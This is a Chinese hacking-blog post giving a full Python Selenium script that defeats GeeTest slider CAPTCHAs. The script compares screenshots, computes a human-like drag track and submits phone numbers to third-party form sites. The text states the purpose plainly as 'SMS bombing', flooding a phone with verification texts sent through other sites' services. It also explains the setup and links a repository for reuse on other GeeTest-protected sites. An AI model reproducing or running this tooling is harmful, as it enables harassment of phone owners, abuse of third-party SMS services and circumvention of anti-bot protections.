极验验证码破解 实现短信轰炸 模拟用户滑动解锁

技能树, 渗透测试, 黑客工具, 黑客技术

极验验证码破解 实现短信轰炸

极验验证码破解 先上代码 黑客书籍

#! python3
# coding:utf-8

import time,random
from PIL import Image
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
import logging

logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s -%(message)s')

phoneNum = '13456788765'
# initial offset
initial_offset = 10
URLs = ['https://biaodan.info/q/7sisis']

#TODO get html elements
def sendPhone(driver, phoneNum, phoneInputClass, sendPhoneButtonId):
  # driver = webdriver.Chrome()
  logging.debug('Send Phone Start')
  phoneInput = driver.find_element_by_class_name(phoneInputClass)
  phoneInput.send_keys(phoneNum)
  time.sleep(2)
  sendBtn = driver.find_element_by_id(sendPhoneButtonId)
  sendBtn.click()
  time.sleep(5)

#TODO compare Captcha & return tarck
def elementsScreenshot(driver, bgImgClass, dragBallClass):
  # driver = webdriver.Chrome()
  logging.debug('start make background screenshot')
  driver.find_element_by_class_name(bgImgClass).screenshot('bg_full.png')
  time.sleep(2)
  ball = driver.find_element_by_class_name(dragBallClass)
  ActionChains(driver).click_and_hold(ball).perform()
  ActionChains(driver).move_by_offset(190, 0).perform()
  # move the ball to right
  # this is important
  time.sleep(0.5)
  driver.find_element_by_class_name(bgImgClass).screenshot('cut.png')
  # move the ball to left
  ActionChains(driver).move_by_offset(-30, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-50, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-40, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-30, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-40, 0).perform()

def dragBall(driver, track, dragBallClass):
  ball = driver.find_element_by_class_name(dragBallClass)
  logging.debug('ball start move')
  # simulate human's behave
  while track:
    len = random.choice(track)
    ActionChains(driver).move_by_offset(len, 0).perform()
    track.remove(len)
    logging.debug(track)
    time.sleep(len/10)
  imitate2L = ActionChains(driver).move_by_offset(-2, 0)
  imitateL = ActionChains(driver).move_by_offset(-1, 0)
  time.sleep(0.015)
  imitate2L.perform()
  time.sleep(0.04)
  imitateL.perform()
  time.sleep(0.04)
  imitate2L.perform()
  time.sleep(0.04)
  imitateL.perform()
  time.sleep(0.04)
  imitate2L.perform()
  ActionChains(driver).pause(random.randint(6, 10) / 10).release(ball).perform()

def getTrack(distance):
  logging.debug('calcute distance track')
  # simulate human's hebace s = 1 / 2 a t t
  track =[]
  current = 0
  mid = distance * 3 / 4
  t = random.randint(2, 3) / 10
  v = 0
  logging.debug('1')
  while current < distance:
    if current < mid:
      a = 2
    else:
      a = -3
    v0 = v
    v = v0 + a * t
    move = v0 * t + 1 / 2 * a * t * t
    current += move
    track.append(round(move))
    logging.debug(track)
  return track

# TODO compare two img
def compareImg(img1, img2, x, y):
  logging.debug('compare img start')
  pix1 = img1.load()[x, y]
  pix2 = img2.load()[x, y]
  threshold = 60
  if (abs(pix1[0] - pix2[0] < threshold) and abs(pix1[1] - pix2[1] < threshold) and abs(pix1[2] - pix2[2] < threshold)):
    return True
  else:
    return False

def getOffset(bgFullPath, bgPath):
  logging.debug('get img offset')
  bg_full = Image.open(bgFullPath)
  bg = Image.open(bgPath)
  left = initial_offset
  for width in range(left, bg_full.size[0]):
    for height in range(bg_full.size[1]):
      if not compareImg(bg_full, bg, width, height):
        left = width
        return left
  return left
#TODO execute Crack it

def main(driver):
  logging.debug('main() start')
  for url in URLs:
    driver.get(url)
    logging.debug('%s get html', url)
    time.sleep(3)
    sendPhone(driver, phoneNum, 'filter-input', 'btnSendCode')
    elementsScreenshot(driver, 'gt_cut_fullbg', 'gt_slider_knob')
    distance = getOffset('bg_full.png', 'cut.png')
    # logging.debug('%s',distance)
    track = getTrack(distance)
    dragBall(driver, track, 'gt_slider_knob')
    time.sleep(3)

if __name__ == '__main__':
  driver = webdriver.Chrome()
  for i in range(1, 2):
    logging.debug('%s Test', i)
    try:
      main(driver)
    except:
      print("%d Error", i)
      pass
  driver.close()
  driver.quit()

在部分进行安全渗透测试的场景下,需要对手机号进行短信轰炸操作,无奈不想在这方面增加投入,无意中看到了表单大师的部分网站提供短信验证码服务,但是每次需要进行验证,于是便有了本篇交流。
某个主页(无恶意,搜索引擎得到)

随意输入的号码,然后点击发送,出现验证码

要实现网站群发的话要具备以下几个条件
1、一定数量的发送验证码服务的网站(每个页面有一个时间限制,限制120s后再次发送,但是根据后期实践效果,不需要等待120s,但是间隔一段时间可以提高验证码的成功率)
2、webdriver+selenium实现爬虫,自动化操作
3、就是实现代码了,在github上有其他人的实现代码,但是在表单大师上表现效果不佳,所以便有了以下实现

开始实现了
首先引入库,部分变量申明

找到电话号码输入框,模拟输入电话号码

代码实现

验证码图片元素(采用区域截图方式,快速,方便,而且很准确,极验的这张图片,是无法通过元素审查直接得到下载地址,是一片一片拼成的)

代码实现

然后获取要操作的元素(就是拉动的那个球)

代码实现

在后面就是在验证码活动的过程中的轨迹计算,首先通过比较图片元素的不同,获得要到达的地点(这就是之前截图时将滑块移到最右边,确保第一次计算出来的不同就是要移动的终点,移动轨迹的算法参考了网上的实现,简单来讲就是s=v0t+1/2at^2)



到这里,基本就已经结束了,接下来就是主程序了

其实这也可以用于采用了极验的其他场合,大家自己修改
代码上传github,欢迎大家fork,star
https://github.com/xtom598/geeTestCode

from

Leave a Reply

您的邮箱地址不会被公开。 必填项已用 * 标注